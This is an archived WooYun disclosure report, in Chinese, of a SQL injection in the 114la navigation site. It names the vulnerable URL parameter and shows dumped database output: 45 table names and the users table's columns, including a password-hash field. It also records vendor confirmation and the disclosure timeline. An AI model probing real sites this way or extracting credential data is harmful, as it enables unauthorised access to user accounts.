乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-24: 细节已通知厂商并且等待厂商处理中 2013-09-24: 厂商已经确认,细节仅向厂商公开 2013-10-04: 细节向核心白帽子及相关领域专家公开 2013-10-14: 细节向普通白帽子公开 2013-10-24: 细节向实习白帽子公开 2013-11-08: 细节向公众公开
RT
来一枚114啦网址导航的SQL注入。已读出管理员数据,去cmd5解密还是收费的,唉。。地址:http://app.114la.com/?q=88952634
Database: 114la_app[45 tables]+-----------------------------+| `ylmf_link_2013-07-23` || app || category || hotcity || test || tool_add_postcode || tool_food_introduction || tool_food_type || tool_hdjr || tool_hdjr_scgj || tool_history_day_event || tool_history_day_list || tool_jidanci || tool_jidanci_type || tool_mobile || tool_train || tool_train_checi || tool_train_detail || tool_train_province || tool_train_province_station || tool_train_station || tool_train_station_union || tool_tv_city || tool_tv_province || tool_tv_station || tool_zip_city || tool_zip_country || tool_zip_province || tool_zip_tw || tool_zip_village || users || users_admin_log || users_login_history || users_purview || users_purview_config || ylmf || ylmf_city || ylmf_city_bk || ylmf_foreign || ylmf_link || ylmf_link1 || ylmf_link_2 || ylmf_scenery || ylmf_weather || ylmf_weather_id |+-----------------------------+
Database: 114la_appTable: users[11 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| email | varchar(50) || groups | varchar(100) || loginip | varchar(15) || logintime | int(10) unsigned || pools | varchar(20) || regip | varchar(15) || regtime | int(11) || sta | smallint(6) || uid | int(10) unsigned || user_name | varchar(20) || userpwd | char(32) |+-----------+------------------+
见详细说明。。
管理员修复吧。
危害等级:中
漏洞Rank:10
确认时间:2013-09-24 11:48
非常感谢!
暂无